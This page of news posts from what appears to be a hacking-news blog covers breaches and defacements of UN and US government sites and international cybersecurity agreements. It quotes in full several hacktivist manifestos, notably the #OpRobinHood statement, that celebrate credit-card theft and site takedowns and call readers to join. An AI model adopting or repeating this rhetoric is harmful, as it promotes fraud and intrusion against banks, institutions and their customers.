Showing posts sorted by relevance for query United Nations. Sort by date Show all posts
Showing posts sorted by relevance for query United Nations. Sort by date Show all posts

United Nations Development Programme (UNDP) Hacked By Over-X

United Nations Development Programme (UNDP) Hacked By Over-X 

Once again United Nations faced cyber attack, this time an hacker code named "Over-X" has hacked into the server of UNDP- United Nations Development Programme and uploaded his page. Still the reason of this hack is unknown, but according to the sources the hacker belongs to some Algerian hackers community. Also there is probability that he might be linked with infamous Anonymous. As expected Over-X have also created a deface mirror and that can be found on Arab-Zone. We would also like to refresh your memory while saying that earlier in 2011 and also in 2102 United Nations faced massive cyber attacks. It was hacker collective TeaMp0isoN with Anonymous who breached the server of United Nation & stolen thousands of  user names and passwords, that operation was dubbed #OpRobinHood. After that La Intrusa (Indian Hacker) hit United Nations Public Administration Network (UNPAN) and uploaded his page. Few months later another hacker named Casi targeted United Nation and dumped the database. If you dig the history you will find more attacks on UN. 




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

#OpRobinHood By TeaMp0isoN & Anonymous, Thousands Of User Data Stolen From United Nations Server


Hacktivist Anonymous is now teamed up with another hacker group named TeaMp0isoN for their latest campaign Operation RobinHood (#OpRobinHood). As a result more than 1,000 usernames and passwords stolen from a United Nations server. TeamPoison and Anonymous posted an announcement while threatening a series of data breaches and robberies against major banks under the name Operation Robin Hood, which the two groups describe as a continuation of the Occupy Movement protests begun in New York two months ago. 
As a way to strike back against "the banks," TeamPoison and Anonymous will take from the rich and give to the poor through some kind of ill-defined credit-card scam, though it's not clear if the credit cards being targeted will belong to "the banks" or whether Anonymous and TeamPoison plan to make fraudulent charges on consumer credit cards that will indirectly punish the banks backing those cards. 
The stolen username and passwords from the United Nations server was openly posted on a pastebin, later it was removed for violence. 

Anonymous & TeaMp0isoN Official Press Release:-

"#OpRobinHood: TeaMp0isoN and Anonymous 
Hello, we are p0isAnon. Anonymous and TeaMp0isoN have joined forces to fight censorship in the name of OpCensorThis. There is a new operation that has been taking place over the actions of Banks in response to the Occupy Movement. We have watched our brothers and sisters being refused their hard earned money by the banks on top of being beaten and brutalized by officers during peaceful demonstrations. Congratulations banks, you have gotten our attention. 
You ignore your customers and use authorities to censor their voices. Operation Censor This will not stand for such acts and is spawning another operation under Operation Cash Back which already removed well over 500,000 accounts from banks and put them into credit unions. This is the next step. Banks have stolen millions from its customers as well as lacked the security to protect them. We give you Operation Robin Hood. 
In regards to the recent demonstrations and protests across the globe, we are going to turn the tables on the banks. Operation Robin Hood is going to return the money to those who have been cheated by our system and most importantly to those hurt by our banks. Operation Robin Hood will take credit cards and donate to the 99% as well as various charities around the globe. The banks will be forced to reimburse the people there money back.
We are going to take what belongs to us. The Banks have thrown people out on the streets with corrupted actions. When the poor steals, it’s considered violence, but when the banks steal from us, it’s called business. 
We have already taken Chase, Bank of America, and CitiBank credit cards with big breaches across the map. We have returned it to the poor (the TRUE 99%) who deserve it. 
We have donated thousands to many protests around the world. We have donated thousands to the homeless and other charities. Our government has fallen short in many ways. It’s time for the people to step up. We are finished depending on our government to do right by us. How safe can the banks be keeping you when we are easily able to steal thousands already. You have the benefit of us being the good guys.
We are not afraid of the Police, Secret Service, or the FBI. We are going to show you banks are not safe and take our money back. We are going to hit the true evil while not harming theirs customers and helping others. We are not only starving the banks but are ready to start the attack. We have come to take the 99% ‘s money back. We are not asking permission. 


Let’s see how Banks like paying out money like they made us do. Is it called stealing when one takes what was theirs in the first place? Is it called stealing elections when banks are funneling our millions into paying off congressmen and lobbyists. It’s time for the banks to pay for their crimes and corruption. We are not waiting for our government to step up and take action. It’s time for the banks to pay for not protecting you and only causing harm. But why feel sorry for them while they make us pay every day? Make us over pay for their services? Make us pay all their little charges? Operation Robin Hood urges YOU, to now move your accounts into secure credit unions, before it’s too late while we hit them from the inside. 
We are going to make the banks deliver your money back to you with a smile on their faces and hate in their heart. The only fraud happening has been the actions of the banks frauding the people. It’s time for the banks to do business with Anonymous and TeaMp0isoN. And one of us is not as harsh as all of us. We are looking forward to start doing business with you pigs. 
How loud will you squeal when the same is being done to you? We will avenge every person banks turned down and stolen from. Join us in Operation Robin Hood. Take from the banks and give to the poor. Our actions will be swift. It’s time for the people to rise up and the banks to remember who they work for. It’s time we fight back. It’s time YOU take back your freedom. We are done asking politely.
Banks, you have got the attention of the Hydra of the internet that has grown fangs of poison. 
The only question now, is do they expect us? 


We are p0isAnon
We are Robin Hood
We are Legion
We do not forgive
We do not forget
Expect us.


Operation Robin Hood… fully initiated."








SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

NATO Said:- Anonymous will be "infiltrated" and "persecuted"


The North Atlantic Treaty Organization contains the combined military might of 28 member countries, including Germany, the United Kingdom, and France. All three of those nations, and the United States, possess huge armies, nuclear weapons, and are committed to Article Five of NATO's charter:
"The Parties agree that an armed attack against one or more of them in Europe or North America shall be considered an attack against them all and consequently they agree that, if such an armed attack occurs, each of them, in exercise of the right of individual or collective self-defence recognised by Article 51 of the Charter of the United Nations, will assist the Party or Parties so attacked."
Yet reading NATO's new draft general report on cyber security, one gets the impression that what the alliance worries about most these days is not an "armed attack," but a cyberattack on its network servers, or the infrastructure of any of its member countries.
"In this Information Age, the North Atlantic Alliance faces a dilemma of how to maintain cohesion in the environment where sharing information with Allies increases information security risks," NATO's Information and National Security survey observes, "but where withholding it undermines the relevance and capabilities of the Alliance."
And WikLeaks and Anonymous get top billing as visible threats to NATO's efforts to control its information perimeters.
"The time it takes to cross the Atlantic has shrunk to 30 milliseconds, compared with 30 minutes for ICBMs and several months going by boat," the report warns. "Meanwhile, a whole new family of actors are emerging on the international stage, such as virtual 'hactivist' groups. These could potentially lead to a new class of international conflicts between these groups and nation states, or even to conflicts between exclusively virtual entities."

The irony of 9/11:-

Authored by Lord Michael Jopling, Rapporteur for NATO, the study begins with an irony. Following the attacks of September 11, 2001 on New York City and Washington, DC, the United States government concluded that one of the reasons that the plot succeeded was because information about its perpetrators wasn't widely shared among US intelligence agencies, especially the Department of Defense, CIA, State Department, and Federal Bureau of Investigation.
And so the US opened up its data sharing practices. This made matter worse, Jopling appears to suggest. It "resulted in an exponential number of people obtaining access to classified information." Over 850,000 functionaries now enjoy some kind of "top-secret" security status, he claims. Many have access to the DoD's Secret Internet Protocol Router Network (SIPRNet), dispenser of embassy cables.
The study cites critics of SIPRNet who say that it lacks the ability to detect unauthorized access. "Thus, those in charge of the network design relied on those who had access to this sensitive data to protect it from abuse. These users were never scrutinized by any state agency responsible for the data-sharing system."
Jopling doesn't explicitly blame this openness policy for WikiLeaks phenomenon, but his narrative leads right into Private Bradley Manning, accused of providing documents for the outfit, prompting the group's famous publication of a continuous stream of State Department cables.
Not surprisingly, he thinks that this is bad:
The Rapporteur believes that even if one is in favour of transparency, military and intelligence operations simply cannot be planned and consulted with the public. Transparency cannot exist without control. The government, and especially its security agencies, must have the right to limit access to information in order to govern and to protect. This is based on the premise that states and corporations have the right to privacy as much as individuals do and that secrecy is required for efficient management of the state institutions and organizations.

Hacktivity:-

A big chunk of the assessment is devoted to the activities of Anonymous, most notably its denial-of-service attacks against PayPal, MasterCard, Visa, and Amazon.com for shutting down financial and server space services to WikiLeaks. Next comes the Anonymous assault on HBGary Federal, which had been planning some methods to take down WikiLeaks and expose Anonymous. It didn't turn out that way, of course. Instead, Anonymous penetrated the security company, erasing data, publishing e-mails, and wrecking its website.
The author seems confident, however, that the notorious group's days are numbered. "It remains to be seen how much time Anonymous has for pursuing such paths," Jopling writes. "The longer these attacks persist the more likely countermeasures will be developed, implemented, the groups will be infiltrated and perpetrators persecuted."
But the larger question hovering over this document is what NATO should do if one of its over two-dozen member nations is cyberattacked. The US has lately been pondering this dilemma as well.
"Certain hostile acts conducted through cyberspace could compel actions under the commitments we have with our military treaty partners," says a White House strategy report published in mid-May. "When warranted, the United States will respond to hostile acts in cyberspace as we would any other threat to our country."
This NATO draft seems to want to go in a similar direction—especially if something on the scale of a Stuxnet malware attack is deployed against a member nation. Designed to penetrate software for industrial equipment, researchers believe that it was originally intended for Iran's nuclear program.
"Some argue that Article 5 should not be applied with respect to cyberattacks because their effect so far has been limited to creating inconvenience rather than causing the loss of human lives and because it is hard to determine the attacker," Jopling notes. "However, The Rapporteur believes that the application of Article 5 should not be ruled out, given that new developments in cyber weapons such as Stuxnet might eventually cause damage comparable to that of a conventional military attack."

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

DHS & Public Safety Canada Started Joint Cybersecurity Action Plan

DHS Public Safety Canada Started Joint Cybersecurity Action Plan

A joint venture Cyber Security plan has been announced by US Department of Homeland Security and Canada. According to the official website of Public Safety Canada - PS Canada along with the Department of Homeland Security (DHS) are pursuing a coordinated approach to enhance the resiliency of our cyber infrastructure. The Cybersecurity Action Plan (the Action Plan) between PS and DHS seeks to enhance the cybersecurity of our nations through increased integration of PS' and DHS' respective national cybersecurity activities and improved collaboration with the private sector. This Action Plan represents just one of many important efforts between Canada and the United States to deepen our already strong bilateral cybersecurity cooperation.
As the Internet knows no borders, all countries have a responsibility to prevent, respond to, and recover from cyber disruptions and to make cyberspace safer for all citizens across the globe. Due to a shared physical border, Canada and the United States have an additional mutual interest in partnering to protect our shared infrastructure. This Action Plan aims to articulate a shared approach to fulfill PS' and DHS' vision of working together to defend and protect our use of cyberspace and to strengthen the resiliency of our nations. These efforts, combined, advance the objectives articulated by President Obama and Prime Minister Harper in the February 2011 declaration, Beyond the Border: A Vision for Perimeter Security and Economic Competitiveness.
This Action Plan outlines three goals for improved engagement, collaboration, and information sharing at the operational and strategic levels, with the private sector, and in public awareness activities, for activities conducted by PS and DHS. The Action Plan establishes lines of communication and areas for collaborative work critical to enhancing the cybersecurity preparedness of both nations. The Action Plan's goals and objectives are to be conducted in accordance with the June 2012 Statement of Privacy Principles by the United States and Canada. This Action Plan is intended to remain a living document to be reviewed on a regular basis and updated as needed to support new requirements that align to the Plan's key goals and objectives. It intends to support and inform current and future efforts to advance the goals of Beyond the Border, which ultimately seeks to enhance broad bilateral cooperation on cybersecurity efforts across both governments.

Goals and Objectives:-

1. Enhanced Cyber Incident Management Collaboration between National Cybersecurity Operations Centers

PS' Canadian Cyber Incident Response Centre intends to work jointly with DHS' United States Computer Emergency Readiness Team and Industrial Control Systems Cyber Emergency Response Team towards the following objectives:
  • 1.1 Increase real-time collaboration between analysts by improving existing channels for remote communication and arranging in-person visits;
  • 1.2 Enhance information sharing at all classification levels and collaborate on training opportunities, while promoting inter-agency coordination, as appropriate, as well as the proper protections for information, as outlined in the Statement of Privacy Principles;
  • 1.3 Coordinate on cybersecurity incident response management, relating to defense, mitigation, and remediation activities and products, including with other public and private entities consistent with each country's laws and policies;
  • 1.4 Align and standardize cyber incident management processes and escalation procedures; and
  • 1.5 Enhance technical and operational information sharing in the area of industrial control systems security.

2. Joint Engagement and Information Sharing with the Private Sector on Cybersecurity

Due to the shared nature of critical infrastructure between Canada and the United States, PS and DHS intend to collaborate on cybersecurity-focused private-sector engagement for cybersecurity activities for which they are responsible through the following objectives:
  • 2.1 Share engagement approaches for private sector;
  • 2.2 Exchange and collaborate on the development of briefing materials for the private sector;
  • 2.3 Jointly conduct private sector briefings;
  • 2.4 Review approaches and align processes for private sector engagement through requests for technical assistance and non-disclosure agreements; and
  • 2.5 Standardize protocols for sharing information.

3. Continued Cooperation on Ongoing Cybersecurity Public Awareness Efforts

Cybersecurity is a shared responsibility and everyone, including our citizens, has a role to play. With increased media attention devoted to cybersecurity incidents and with the continuing growth of electronic commerce and social media, it is imperative that citizens receive clear and trustworthy information on how to manage cyber threats to themselves and their families. Ensuring that government's cybersecurity awareness messages are consistent across our border helps to deliver that information effectively and consistently. PS Communications, the DHS Office of Public Affairs, and the National Protection and Program Directorate's Office of Cybersecurity and Communications (CS&C) intend to continue to work together as they:
  • 3.1 Collaborate on public awareness campaigns (websites, social media activities, education material, etc.);
  • 3.2 Collaborate on Cybersecurity Awareness Month (October); and
  • 3.3 Share and coordinate messaging on issues of common interest.

Governance of the Joint Action Plan:-

Senior officials within PS and CS&C intend to review and provide additional guidance in order to update this Action Plan on a quarterly basis. This Action Plan is intended to be a part of broader inter-governmental coordination across government agencies in both the United States and Canada.


To Download The Full Cybersecurity Action Plan Between Public Safety Canada and the Department of Homeland Security Click Here



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

United Nation Hacked, Vulnerability Exposed & Database Dumped

United Nation Hacked, Vulnerability Exposed & Database Dumped By Casi
United Nations official website again became the victim of cyber attack. Earlier TeaMp0isoN has hacked the United Nation server and stolen more than thousand of user name and passwords. This time another hacker named Casi targeted United Nation. In a press release the hacker has posted many blind SQL-i vulnerable links of UN official site by which any attacker can get get inside the db and create lots of damages. The hacker group also  dumped the database of United Nation. According to the hacker "I fuck actually system... I fighting for Internet Freedom, equiality & rights for all. You're FREEDOM my brothers & my sisters ! <3" The dumped database can be found on a pastebin release by the hacker where they have also claimed that they are fighting for freedom. So it seems that the UN just has bad cyber security. It must be embarrassing for the them to be hacked by such a basic SQL injection attack. Passwords were not exposed, but the real danger lies in what other hackers can do with the information. Still United Nation did not replied about this hack.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

United Nations Public Administration Network (UNPAN) Hacked By La Intrusa


The official website is of United Nations Public Administration Network (UNPAN) is vulnerable to DNN.  La Intrusa (Indian Hacker) find this vulnerability. Using that flaws he uploaded his .txt file on the webserver of UNPAN and defaced the site.

Hacked Site:-
http://www.unpan.org/Portals/0/god.txt
Mirror Link:-
http://www.zone-hack.com/defacements/?id=1719



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Interpol, ITU & IMPACT Jointly Singed a Hostorical Agreement in Cybersecurity

Interpol, ITU & IMPACT Jointly Singed an Agreement to Exchange Information, Expertise & Enhance Cybersecurity

During the 81st INTERPOL General Assembly taking place in Rome, Italy a historical and very vital cooperation agreement has been singed. In an effort to further enhance cybersecurity around the world, International Multilateral Partnership Against Cyber Threats (IMPACT), the cybersecurity executing arm of United Nations’ specialised agency – the International Telecommunication Union (ITU) and the General Secretariat of the International Criminal Police Organisation – (INTERPOL), reached a historic milestone with the signing of a landmark ‘Cooperation Agreement’ between both international organisations. Through this Agreement, it allows both IMPACT and INTERPOL to exchange information, expertise as well as to enhance both organisations’ knowledge base in the field of cybersecurity. The Agreement will also see the cross promotion of capacity building activities aimed at the public and private sector and the civil society, with an objective to curb cyber crimes by protecting the cyber space and orchestrating a safer global community. 
The Cooperation Agreement paves the way for INTERPOL and ITU-IMPACT to effectively cooperate within the scope of their respective mandates and resources in the field of cybersecurity. This Agreement is also designed to provide a broad framework for such cooperation to take place and to establish a collaborative association, with a view to promoting cybersecurity capacity-building and addressing cyber threats on a global scale. Datuk Mohd Noor Amin, Chairman of IMPACT and Mr Ronald K. Noble, Secretary General of INTERPOL signed the Cooperation Agreement today, witnessed by ITU Secretary-General, Dr. Hamadoun I. Touré. With 144 countries now, part of the ITU-IMPACT coalition, IMPACT is entrusted with the task of providing cybersecurity support and services to ITU’s Member States and other organisations within the UN system. ITU-IMPACT’s global partnership now embraces over 200 industry, academia and international organizations. 

“This kind of cross-agency collaboration is essential to combating the increasingly serious problem of international cybercrime,” said ITU Secretary-General Dr. Hamadoun I. Touré. “For too long, cyber criminals have hidden behind national borders, hoping to escape detection or eluding the jurisdiction of national law enforcement authorities. This new partnership with INTERPOL represents a major step forward in our efforts to bring such criminals to book.”
Datuk Mohd Noor Amin, Chairman of IMPACT added; “The signing of this agreement is truly a landmark event for all of us. For the first time, we are effectively pooling together and merging the resources from INTERPOL’s community of police forces worldwide with ITU-IMPACT’s existing stakeholders from governments, telecommunications regulators, CERTs, ISPs, ICT industry and academia. ITU’s recent MOU with the United Nations Office of Drug and Crime (UNODC) further strengthens the partnership by potentially adding in judicial officers and prosecutors under the ITU-IMPACT umbrella. This coming together of various different, but important, stakeholders is vital if we are going to succeed against the cyber criminals and enhance international cybersecurity.”



-Source (PRWeb)








SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Library of Congress (Govt. of United States) Under Cyber-Attack, Database Exposed By BlitzSec

Library of Congress (Govt. of United States) Under Cyber-Attack, Database Exposed By BlitzSec 

Official website of Library of Congress (Govt. of United States) faced cyber attack from a newly formed hacker group named BlitzSec. The hackers have found SQL-i vulnerability on the Library of Congress official site which leads them to gain access on the database and exposed many credentials. In a pastebin relase BlitzSec revealed full database including DB Tables, Columns, User-id, Email, Password, Admin details and so on. 
Earlier this group has found serious security flaws in AOL.com & Ask.com which can even lead to cookie catching attacks.

Press Release of BlitzSec :- 
"Congress this is a message to you, STOP passing laws of tyranny, STOP letting those such as Rothschild and Rockefeller control the government.  Get the printing press out of the hands of the FED and back under the houses of congress!  STOP throwing the Constitution of the United States on the ground and using it as your personal doormat, stand by the Constitution, protect it from those who wish to abolish it which inturn will abolish any and all rights we have.  We are in a police state, you have the power to stop it, you have the power to return us back to what we were before thing such as NDAA and the infamous "Patriot Act". 
You say we are the criminals?  You say we are the terrorists, well ladies and gentle men of congress, I'm sorry to say but you are wrong... Dead wrong, you my friends are the criminals, you my friends are the terrorists.  The Constitution is not just "An outdated piece of paper" as you and the rest of the government think, it is what our country was founded the those principles were what helped form this great nations, and you are destroying it now.  If you do not do something soon, you can take our word, We The People will rise up, We The People will put an end to it and We The People will return this country back to its former greatness..."




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

48 Countries Worldwide Joined Biggest Global Alliance Against Child Sexual Abuse Online

48 Countries Worldwide Joined Biggest Global Alliance Against Child Sexual Abuse Online

Cyber bullying, online child sexual abuse has became one of the biggest threat and challenge for the society. Several security report are pointing out that the number of cyber bully is increasing every day. There are daily reminders about those risks, whether it's the tragic fate of Amanda Todd, bullied into suicide. To get rid of these burning issues European Union (EU) Commissioner for Home Affairs Cecilia Malmström together with US Attorney General Eric Holder launched a Global Alliance against Child Sexual Abuse Online. In this campaign Forty-eight countries have joined forces to launch the most expansive fight ever against the spread of online child sex abuse. According to current estimates, there are more than one million images of sexually abused and exploited children now online. Every year, that number grows by 50,000 new images, according to the United Nations Office on Drugs and Crime (UNODC). Participants at the launch include Ministers and high-level officials from 27 EU Member States, who are also joined by 21 countries outside the EU (Albania, Australia, Cambodia, Croatia, Georgia, Ghana, Japan, Moldova, Montenegro, New Zealand, Nigeria, Norway, the Philippines, Serbia, Republic of Korea, Switzerland, Thailand, Turkey, Ukraine, United States of America, and Vietnam). The countries of the alliance are committing themselves to a number of policy targets and goals. Thanks to increased international cooperation, the fight against child sexual abuse online will therefore be more effective.
"Behind every child abuse image is an abused child, an exploited and helpless victim. When these images are circulated online, they can live on forever. Our responsibility is to protect children wherever they live and to bring criminals to justice wherever they operate. The only way to achieve this is to team up for more intensive and better coordinated action worldwide", said Commissioner for Home Affairs Cecilia Malmström.
“This international initiative will strengthen our mutual resources to bring more perpetrators to justice, identify more victims of child sexual abuse, and ensure that they receive our help and support,” said Attorney General Holder. “Through this global alliance we can build on the success of previous cross-border police operations that have dismantled international pedophile networks and safeguard more of the world’s children.” 

The participants of this campaign put out this list of goals for the new initiative, which has been dubbed the Global Alliance Against Child Sexual Abuse Online, in a press release:-

  • Enhance efforts to identify victims and ensure that they receive the necessary assistance, support and protection;
  • Enhance efforts to investigate cases of child sexual abuse online and to identify and prosecute offenders;
  • Increase children's awareness of online risks, including the self-production of images and "grooming" methods used by paedophiles;
  • Reduce the availability of child abuse material online and the re-victimization of children;
  • Establish dedicated law enforcement units for these crimes in all countries;
  • Make it easier to initiate joint cross-border police investigations;
  • Intensify co-operation with hotline services, where the public can report findings of online child pornography; and
  • Ensure that the Interpol international database of child abuse material grows by 10 percent annually.







SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Hackers Shut Down The Entire Internet Service Provider's (ISP) Network In Palestinian


Internet service is completely cut off in Gaza Tuesday and partially shut down in the West Bank after an attack on the main Internet provider to the Palestinian territories, according to a minister with the Palestinian Authority.
"This is a very serious and vicious attack," Dr. Mashour Abu-Daqqa, the minister of Communications and Information Technology, told Media. The attack, which affected most of the Palestinian Internet communication network, also targeted domain addresses, said Abu-Daqqa. The minister said hackers are using international IP servers originating in Germany, China, and Slovenia to send millions of attacks in the form of viruses to penetrate and disrupt the Internet communications. There is no word on who, exactly, is behind the attacks.
"It does not mean the attackers are from there, it is only the origin of these virus attacks using these international servers and other international country servers," Abu-Daqqa said. Officials have not ruled out the possibility that the attack could be related to Monday's decision by the United Nations education and science agency, UNESCO, to accept a Palestinian bid for full membership in the organization. The move prompted the United States to withhold funding from UNESCO.
Abu-Daqqa said the hacking "is not the act of an individual or group" but possibly a "state-sponsored attack" intended to paralyze Internet communications in the Palestinian territories. Efforts to restore Internet service continue, the minister said.


-News Source (CNN)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Two Nigerians Arrested For Hacking into Mail Servers of Ghana Armed Force & Stealing $13,978

Two Nigerians Arrested For Hacking into Mail Servers of Ghana Armed Force & Stealing $13,978

Two middle aged Nigerians have been arrested for hacking into mail server of Ghana Armed Force (GAF). The suspects, Peter Okechukwu, 32, and Emmanuel Ifedi, 31, were arrested by officials of the Criminal Investigations Department (CID) of the Ghana Police Service at a branch of the United Bank of Africa (UBA). In a report Ghana Business News said-  these two cyber criminal get busted in Accra  while attempting to divert $13,978 belonging to, Ghanaian peacekeepers after they had succeeded in hacking into the e-mails of GAF. According to the Director-General of the CID, Commissioner of Police Mr Prosper Agblor, in November this year the two suspects managed to enter the e-mails of Continental African Trading Limited (CATAL) and the United Nations Interim Force in Lebanon (UNIFIL) GHANBATT 76 and intercepted all electronic communications between the two parties. CATAL, an international organisation, had been supplying home appliances' to Ghanaian peacekeeping troops on various missions at different locations in the world. 
Recently, CATAL was contacted, as usual, by the GAF to supply home appliances to UNIFIL GHANBATT 76 peacekeeping troops in Lebanon. Mr Agblor said there was correspondence concerning the supply of the items between CATAL and the military through the Internet. Along the line, he said, the e-mails between the GAF and CATAL were hacked into by the two Nigerians, who intercepted all mails from both ends and replied them as if the replies were coming from the rightful receivers of the e-mails. 
He said the two suspects, using the identity of CATAL, sent an e-mail to the GAF instructing it to pay $13,978 into a UBA account number 01011651102235 as part payment for the supply of the goods. Upon receipt of the information, the GAF transferred $13,978 into the account as instructed by the two suspects.
Mr Agblor said CATAL realized that the GAF had suddenly stopped communicating with the company on matters relating to the transfer of the money and so it followed up with a phone call and detected that the GAF had paid $13,978 into an account number supplied by CATAL. 
He said it was at that stage that the two organisations realised that someone had hacked into their e-mails and quickly reported the issue to the Documentation and Visa Fraud Unit of the CID. Mr Agblor said the Business Development Manager of CATAL reported the case to the police and checks at the bank revealed that the money had not yet been cashed by the suspects. The police quickly mounted surveillance at the bank, awaiting the arrival of the suspects to cash the money. 
According to the CID boss, on November 11, 2012, Okechukwu, who happened to be the owner of the said account, was arrested when he turned up at the bank to cash the amount. Upon interrogation, the police said, Okechukwu admitted to the offence but mentioned Ifedi as the master brain behind the whole deal and led the police to Ifedi's house at Ashaley Botwe, an Accra suburb. Mr Agblor said investigations were still ongoing, after which the two would be put before court.






SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

#Op-Brotherhood By Anonymous & Threatens to Destroy The Muslim Brotherhood


On-line "hacktivist" group Anonymous has declared Operation Brotherhood and Threatens to "Destroy The Muslim Brotherhood". According to the official you tube video release Anon declared that  to hack Muslim Brotherhood websites, starting with the Arabic Ikhwanonline.com, next November 11, 2011, describing the MB as a threat to the revolution. The video, circulated widely on social media, was titled "Operation Brotherhood Take Down".
Khaled Hamza, CEO of Ikhwan Portal which manages MB websites, stated that the MB technical teams and engineers will deal with the message of "Anonymous" as a serious threat, and will take necessary measures to secure its websites.
Anonymous Official Message  in #Op-Brotherhoods:-
"Citizens of the World,
We are Anonymous.Ever since its revolution that shook the world, Egypt has had its fate undecided. Predators who seek to control are waiting to strike at the right moment. They are waiting to take over the country and make it so that another revolution is impossible. We cannot allow this.
The Muslim Brotherhood has become a threat to the revolution Egyptians had fought for, some with their lives. They seek to destroy the sovereignty of the people of Egypt as well as other nations including the United States. The Muslim Brotherhood started as a benevolent group of people with fair and just intentions. However, as decades went by, corruption seized its mission of good and turned it into a power-hungry organization bent on taking over soverign arab states in its quest to seize power from them. They say this is necessary in order to unify the muslim nations into one islamic state, which is a lie.
We will not allow this to happen.Their tactics are very similar to tactics used by the Church of Scientology and ideas implemented in Freemasonry. A person may join only when presented in front of the Grand Master, or the Murshid, and is ordered to adhere to a solemn vow, to follow all orders of the Murshid, without hesitation. They claim to be anti-freemasonry, however they follow distinct principles taken from it. If you were to leave the Brotherhood or present any threat to it, they would take it to offense and begin to intimidate you and put your life as well as your loved ones in danger. This has been experienced by many former followers of the Brotherhood, including citizens in the United States and Great Britain who realized they made a terrible mistake. The Muslim Brotherhood is a threat that must be dealt with.To those listening now, this is not a threat towards the religion of Islam. The Muslim Brotherhood, as well as terrorist organizations affiliating with the religion, defiled and destroyed the very essence of what the religion preaches. Therefore, the Muslim Brotherhood does not represent the true ideas of Islam. In our collective, many of us are Muslim, yet we fight against the corruption in society and the injustice that comes with it.
Infused with its blatant, corrupt ways, the Brotherhood is now a threat to the people. Therefore, Anonymous has decided to destroy the Muslim Brotherhood. We shall proceed to dismantle any form of its organization from the internet. Nothing will stop us. We will show no mercy.

Operation Brotherhood Takedown, engaged.We are Anonymous.

We are Legion.

We do not Forgive.

We do not Forget.

Expect Us."

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

WikiLeaks Revealed Two New Documents of Trans Pacific Partnership Agreement (TPP)

WikiLeaks Revealed Two New Documents of Confidential Trans Pacific Partnership Agreement (TPP)
Last month WikiLeaks has published  the draft of secret Trans Pacific Partnership Agreement (TPP), uncovering the United States' covert international push for stronger intellectual property rights. Now just a month later two more breathtaking documents of TPP has been revealed by the whistle blower, that show the state of negotiations as the twelve TPP countries began supposedly final negotiations at a trade ministers’ meeting in Singapore this week. This leaks come at a particularly inconvenient time for negotiators, as they enter into their fourth day of talks in Singapore amid growing criticism. The talks are premised on secrecy, allowing countries to push for particular proposals without having to justify their positions publicly, but the continued pressure from WikiLeaks has brought unintended attention to the proceedings.
According to official release of WikiLeaks -One document describes deep divisions between the United States and other nations, and "great pressure" being exerted by the US negotiators to move other nations to their position. The other document lists, country-by-country, the many areas of disagreement remaining. It covers intellectual property and thirteen other chapters of the draft agreement. This suggests that the TPP negotiations can only be concluded if the Asia-Pacific countries back down on key national interest issues, otherwise the treaty will fail altogether. The above described two documents are dubbed as TPP Salt Lake Extracts & TPP Salt Lake Positions. For additional information about this issue click Here.  For further updates on TPP and also other hot WikiLeaks stories & cyber issues, just stay tuned with VOGH




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

WikiLeaks Uncovered Secret Trans Pacific Partnership Agreement (TPP), Incoming Threat For Internet

WikiLeaks Uncovered Secret Trans Pacific Partnership Agreement (TPP), Incoming Threat For Internet 
After SOPA, PIPA & ACTA now the Internet is about to face another ferocious challenge named Trans-Pacific Partnership Agreement (TPP). I am sure that many of you are unaware of this TPP, as it is still on process, but WikiLeaks have uncovered ad released secret negotiated draft text for the entire TPP (Trans-Pacific Partnership) which is a multilateral free-trade treaty currently being negotiated in secret by 12 Pacific Rim nations. The current TPP negotiation member states are the United States, Japan, Mexico, Canada, Australia, Malaysia, Chile, Singapore, Peru, Vietnam, New Zealand and Brunei. "This Trans Pacific “Partnership” is really, really bad News. #WikiLeaks" -said the twitter feed of WikiLeaks. From the leaked draft we came to know that  TPP will take time for all the corporate rigging in this lengthy document to be understood, but already it is evident that Internet freedom will be curtailed, access to health care will become more expensive and access to information will be undermined. In short the more you know about the odious Trans-Pacific Partnership, the less you’ll like it. It’s made for corporate intellectual property and profits. According to WikiLeaks official website -"The TPP is the largest-ever economic treaty, encompassing nations representing more than 40 per cent of the world’s GDP. The WikiLeaks release of the text comes ahead of the decisive TPP Chief Negotiators summit in Salt Lake City, Utah, on 19-24 November 2013. The chapter published by WikiLeaks is perhaps the most controversial chapter of the TPP due to its wide-ranging effects on medicines, publishers, internet services, civil liberties and biological patents. Significantly, the released text includes the negotiation positions and disagreements between all 12 prospective member states." 

In the words of WikiLeaks’ Editor-in-Chief Julian Assange, “If instituted, the TPP’s IP regime would trample over individual rights and free expression, as well as ride roughshod over the intellectual and creative commons. If you read, write, publish, think, listen, dance, sing or invent; if you farm or consume food; if you’re ill now or might one day be ill, the TPP has you in its crosshairs.” To download the entire TPP (Trans-Pacific Partnership) draft click here

While talking about Jullian Assange and WikiLeaksand this sensational leak of TPP, I would like to give you reminder that in this year we got several leaks from WikiLeaks, among them -'Detainee Policies' containing more than 100 classified or otherwise restricted files from the United States Department of Defense covering the rules and procedures for detainees in U.S. military custody. SpyFilesGI Files (Global Intelligence Files & Five Million E-mails From Stratfor) & The Syria Files Containing 2.5 Million Emails of Syrian Politicians, Govt, Ministries & Companies. 



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

UNESCO World Heritage Centre Hacked By Xception Code

UNESCO World Heritage Centre Hacked By Xception Code

